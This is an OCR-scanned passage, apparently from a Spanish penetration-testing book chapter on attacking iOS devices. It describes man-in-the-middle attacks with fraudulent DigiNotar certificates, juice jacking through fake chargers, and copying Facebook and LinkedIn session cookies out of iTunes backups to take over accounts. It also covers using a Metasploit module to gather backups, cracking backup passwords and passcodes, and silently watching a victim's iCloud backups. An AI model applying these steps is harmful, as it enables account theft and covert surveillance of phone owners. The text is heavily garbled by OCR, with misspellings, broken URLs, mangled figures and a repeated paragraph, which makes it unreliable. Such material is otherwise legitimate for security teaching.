eres  capaz  de  conseguir  los  cerlificados  falsos  que  el  hacker  irani  se  creo  en  Diginotar  para  Google, 
Hotmail,  etcetera,  podras  utilizarlos  para  ataques  man  in  the  middle,  ya  que  el  usuario  no  puede 
revoear  las  Entidades  de  confianza  manualmente,  y  fue  en  iOS  5  cuando  Apple  los  revoeo.  Estos 
circularon  por  zonas  menos  claras  de  Internet. 

For  otro  lado,  si  se  usa  un  certificado  falso,  el  navegador  generara  una  alerta,  pero  esto  no  tiene  que 
ser  siempre  asi  en  todas  las  aplicaciones.  Por  ejemplo,  la  herramienta  Paypal  para  iOS,  en  el  ano 
201 1  no  detectaba  el  uso  de  un  certificado  falso  en  la  comunicacion,  y  enviaba  datos  a  haves  de  esa 
conexion,  algo  que  tuvo  que  solucionar. 


Ataques  de  Juice  Jacking  a  iOS 

Una  de  los  problemas  que  tiene  iOS  es  que  las  tarjetas  de  memoria  no  se  cifran  con  el  sistema 
iPhone  Data  Protection,  con  to  que  es  posible  extraer  fotos.  notas  y  videos  almacenados  en  etlas.  Un 
alacante  podria,  simulando  un  cargador  de  bateria  en  un  punto  clave,  o  unos  altavoces  en  un  hotel, 
robar  los  datos  de  los  telefonos  que  en  el  se  pinchen,  ya  que  se  puede  configurar  como  un  disco  USB. 
Bste  tipo  de  ataques  tambien  se  pueden  hacer  con  acceso  fisico  al  dispositivo,  pero  si  puedes  ilegar 
af  terminal,  lo  mejor  es  correr  con  el  y  sacarle  todos  los  datos  en  el  laboratorio. 


Fig  8.2 1 :  Los  aitavoces  en  las  habilaciones  de  hotel  son  perfectos  para  ataques  d g  Juice  Jacking 


Un  atacante  podria,  simulando  un  cargador  de  bateria  en  un  punto  clave,  o  unos  altavoces  en  un 
hotel,  robar  los  datos  de  los  telefonos  que  en  el  se  pinchen,  ya  que  se  puede  configurar  como  un  disco 
USB.  Este  tipo  de  ataques  tambien  se  pueden  hacer  con  acceso  fisico  al  dispositivo,  pero  si  se  puede 
Ilegar  al  terminal,  lo  mejor  es  correr  con  el  y  saearle  todos  los  datos  en  el  laboratorio. 
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Post-Explotacion:  Ataque  al  backup  de  un  terminal  iOS 

Los  backups  de  un  terminal  iOS  son  muy  jngosos  desde  el  punto  de  vista  de  un  atacante.  En  ellos* 
se  encuentran  no  soio  datos  de  las  aplicaciones,  sino  contrasenas  de  redes  WiFi,  VPN,  cuentas  del 
correo  electronico,  etcetera.  El  numero  de  contrasenas  almacenadas  en  el  keychain  o  llavero  de  uni 
iPhone  o  un  iPad  e s  muy  alto.  En  e.I  documento  publicado  por  Apple,  titulado  iOS. Security  ( hide 
es  posible  ver  la  lista  de  contrasenas  almacenadas  en  el  dispositivo  que  estarian  al  descubierto  si  sJI 
accediese  a  ios  datos  de  im  backup. 


Item 

Accessible 

Wi-Fi  passwords 

After  first  unlock 

Mail  accounts 

After  first  unlock 

Exchange  accounts 

After  first  unlock 

VPN  certificates 

Always,  non-migratory 

VPN  passwords 

After  first  unlock 

LDAp  CalDAV,  CardDAV 

After,  first  unlock 

iTunes  backup 

When  unlocked,  non-migratory 

Voicemail 

Always 

Safari  passwords 

When  unlocked 

Bluetooth  keys 

Always,  non-migratory 

Apple  Push  Notification  Service  Token 

.  Always,  non-migratory 

iCIoud  certificates  and  private  key 

Always,  nan-migratory 

iMessage  keys 

Always,  non-migratory 

Certificates  and  private  keys  installed  by  Configuration  Profile  Always,  nan-migratory 

SIM  PIN 

Always,  non-migratory 

Fig  8.22:  Coutrasefias  almacenas  en  el  keychain  cle  IOS 

Ademas,  aunque  muchas  aplicaciones  no  almacenen  las  contrasenas  de  manera  insegura  en  el 
terminal,  en  muchos  casos  es  posible  acceder  a  cookies  de  sesiones  abiertas  que  abren  la  puerla  de 
aplicaciones  populares  como  Facebook,  Linkedin  o  Dropbox,  lo  que  permitirla  hacer  un  robo  de  la 
cuenta,  simplementc  con  acceder  a  esos  datos  en  el  backup. 

Por  ejemplo,  en  el  caso  de  Facebook  y  Linkedin ,  solo  hay  que  buscar  los  ficheros  que  se  encuentran 
en  estas  rutas,  copiarlos,  y  pegarlos  en  esa  misma  ubicacion  de  un  dispositivo  con  jailbreak  donde 
este  instalado  Facebook  o  Linkedin,. y  acceder  a  la  cuenta  del  dueno  del  backup. 

-  [Linkedi  n  j/Cookies/Cookies.binarycookies 

-  [Linkedin]/Preferences/com.[inkedin.Linkedin.plist 

-  [Facebookj/Cookies/Cookies.binarycookies 

-  [Facebook]/Preferences/com.linkedin.Linkedin.pIist 


Fig  8.23:  Copiando  las  cookies  de  la  aplicacion  Linkedin  de  im  iOS 


Conocida  la  importancia  de  !os  dates  de  un  bakcup  de  iOS,  en  Metasploil  se  anadio  un  modulo  de 
postexplotaeion  para  extraer  desde  una  sesion  los  ficheros  de  un  backup  de  un  terminal  iOS  en  un 
sistema  operativo  comprometido.  Cuando  se  ejecuta  el  modulo  apple  Jos  backup,  dste  va  a  busear 
en  los  directorios  por  defecto  de  Apple  iTunes  si  existe  algun  backup  de  usuario  y  si  no  es  asi 
devoivera  un  mensaje  de  Wo  users  found  with  an  iTunes  backup  directory’. 

Estos  backups  se  guardan  por  defecto  en  las  siguientes  rutas,  pero  hay  que  tencr  en  cuenta  que  ei 
usuario  puede  decidir  cambiar  la  ubicacion  de  las  mismas,  lo  que  implicarfa  realizar  una  busqueda 
manual  de  clichos  backups  en  el  sistema,  algo  que  puede  ser  tedioso,  pero  mas  que  recomendable. 


Fig  8.24:  Rutas  donde  se  aimacena  localmenle  ios  backups  de  iOS  en  Windows  y  OSX 


Si  el  backup  es  de  una  version  hasta  iOS  4,x,  entonces  se  puede  utilizar  el  modulo  de  post-explotacion 
de post/mulli/gather/applejosjoackupapplejiosjbackup  que  viene  en  el  repositorio  de  Metasploil. 
Sin  embargo,  si  existe  un  backup  pero  es  de  version  iOS  5.X  entonces  data  una  excepcion  y  no 
extraera  ningun  fichero.  Para  solucionarlo,  se  ha  parcheado  el  modulo  para  que  funcione  tambien 
con  los  backups  de  iOS5,  y  para  que  esto  sea  as!  hay  que  descargar  los  ficheros  del  modulo  adaptado 
y  situarlos  como  sigue: 

-  Descargar  apple Jos _backup.rb  desde  la  direccion  http://securitylearn.net/wp-contcnt/ 
uploads/tools/tnsf/applejosjbackup.rb  y  ponerlo  en  ei  directorio:  /opt! metasploil/ ms  ft/ 
modules/post/multi/gather/ 

-  Descargar  apple  backup  manifestdh.rb  desde  la  direccion  http://securitylearn.net/ 
wp-content/uploads/tools/msf/appleJjackupjnanifestdb.rb  y  ponerlo  en  el  directorio  /opt/ 
metasploii/msft/lib/rex/parser / 

Cuando  el  modulo  encuentra  un  backup  de  Apple  iTunes ,  extrae  todos  los  ficheros  y  ios  skua  en  ia 
ruta  ~/. msf4/loot /  como  ficheros  de  base  de  datos  .db.  Sin  embargo,  si  el  backup  del  usuario  esta 


cifrado  todos  los  ficheros  seran  voicados  de  manera  cifrada,  por  lo  que  si  se  quieten  extraer  los  datos 
primero  se  debe  crackear  el  backup  de  iTunes. 

Es  poi  elio  que  si  Iras  haeer  la  extraccion  de  algunos  ficheros,  estos  aparecen  cifrados,  lo  mejor  es 
vo ‘Car  el  backup  eomplelo,  que  pude  tener  varios  Gigabytes  de  tamano,  y  procesarlo  en  local.  Si 
tiene  contrasena  de  Apple  iTunes,  es  decir,  una  password  generada  por  la  aplicacion  iTunes  para  la 
copia  de  seguridad,  primero  habrla  que  utilizar  alguna  herramienla  como  IGs  Password  Recovery 
Suite.  Este  es  un  proeeso  lento,  as!  que  si  los  datos  son  de  vital  importancia  es  posible  que  sea 
necesaria  la  ayuda  de  algun  sistema  de  cracking  de  passwords  disiri buiclo. 


»  BlackBerry  5.x  &  6.x  backups; 

*  Tiu*?Crypt  volumes  ( limited  suomi  t ); 

•  WPA/WPA2  handshakes, 

7  Vou  can  find  more  information  about  thi: 


Man  features  are: 

•  •  Low  level  hand  written  assembler  CPU  optimisations  with  dl  modern  intruction  sets  suppor  t  (AVX,  XOP,  AES-Nl); 

•  Support  for  wide  range  of  GPUs  -  NVIDIA  and  AW  ones; 

.  WPA-PMK  generator  mode  can  be  used  to  create  precompute  tables  for  known  53IDs  making  further  attacks  much 
faster; 

•  Several  types  of  attacks  supported  -  brute-force  and  dictionary  based  ones; 

I  «  Automated  password  recovery  with  predefined/user-defined  scenarios; 

« User -defined  sets  of  rules  for  dictionary  attacks; 

!•  •  Suppor  ts  Unicode  and  ANSI  cktionarles. 

File:  C:\UserstaromosftADDOatatRoamiriolAc.nle 

I  ComateiAMpMe5vndeackup,i‘il9efa3ia65?73392?S5He9180552ce803ia2c05tfdartfe5t.dist 
'  Ty^Je:  Apple®  iOS  4,x/S.x  backup 
:  Protection:  Apple  i05  -l.x/S.x  backup,  PBKDF2/AES 
7  Totai  passwords  to  process:  186.843.979 


I - —  -  -  -  _  _  ±-2SlOi _ £  _  ■ _ L  _ 

j[©  2012  Ivan  Gojubev  „r  1^, tansT ' 
Fig  8.25:  Averiguando  la  password  de  un  backup  de  iTunes  con  IOPRS 


Una  vez  que  el  backup  este  descifrado,  el  siguiente  paso  serla  averiguar  el  passcode  del  usuario 
con  el  que  estan  cifrados  los  datos  del  mismo.  Para  ello  se  pueden  utilizar  las  herramientas  de 
iphone-dataprolection  que  ayudaran  a  crackear  el  passcode  y  a  volear  el  keychain  del  backup. 
Dichas  herramientas  estan  disponibles  en  la  siguiente  direccion:  hup://code.google.com/p/iphone- 
dataprotection/ 


Esto  tambien  puede  hacerse  con  herramientas  comerciales  como  Elcomsoft  Phone  Password 
Breaker .  Con  las  herramientas  de  ElcomSoft  no  solo  se  rompe  el  passcode  y  es  posible  ver  todos  los 
ficheros  del  backup,  sino  que  en  la  ultima  version,  tras’sacar  la  contrasena  del  Apple  ID  del  keychain , 
se  conectan  a  Apple  iCloud  para  analizar  el  backup  constantemente. 
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!7ig  8.26:  Elcomsoft  analiza  !os  backups  de  iOS  en  idoucl 


Este  proceso  permitirfa  a  un  atacanle  descargar  Ios  cambios  en  iCloud mientras  el.  dueno  de!  terminal 
iOS  no  sabe  ni  que  ha  sido  vulnerado,  ya  que  el  backup  se  hace  automaticamenie  en  la  nube  y  el 
atacanle  es  alii  donde  lo  analiza. 


4.  Condusiones 

En  este  capita  l  o  se  han  presentado  los  puntos  debiles  de  la  arquitectura  de  los  dispositivos  Apple 
con  sistema  operativo  iOS.  Como  se  ha  podido  ver,  Metasploit  no  dispone  de  muchas  herramientas 
para  poder  atacar  estos  sistemas  operatives  (solo  cuenta  con  un  modulo  de  postexplotacion  para 
buscar  backups  de  iOS  y  no  esta  muy  perfeccionado).  Ademas  el  numero  de  exploits  publicos  es  muy 
pequeno  para  el  sistema  operativo,  y  no  muy  alto  para  las  aplicaciones  que  vienen  de  serie. 

Sin  embargo,  la  arquitectura  de  este  sistema  operativo  deja  espacios  de  ataque  a  las  comunicaciones 
WiFi,  GPRS,  VPNs,  BlueTooth ,  Mail  o  Sistemas  SMS  que,  haciendo  uso  de  los  mod u los  de 
Metasploit  ptieden  ser  atacadas  desde  el  framework. 

Por  otro  lado  hay  que  tener  presente  que,  a  diferencia  de  Android  donde  no  es  posible  instalar 
Metasploit  de  forma  nativa  y  hay  que  meter  una  distribucion  Linux  en  el  terminal,  en  los  equipos 
iOS  con  jail break  si  que  se  puede  utilizar  tanto  el  framework  de  Metasploit,  como  S.E.T.  e  incluso 
Fast-Track,  lo  que  ayudaria  a  un  peniester  a  atacar  las  oficinas  in  situ. 

Ademas,  muchos  usuarios  de  iOS  realizan  un  proceso  de  jailbreak  o  son  descui dados  con  ei  Iugar  en 
el  cual  conectan  sus  dispositivos,  por  lo  que  es  posible  disenar  malware  a  medida  o  realizar  ataques 
de  Juiced aching. 
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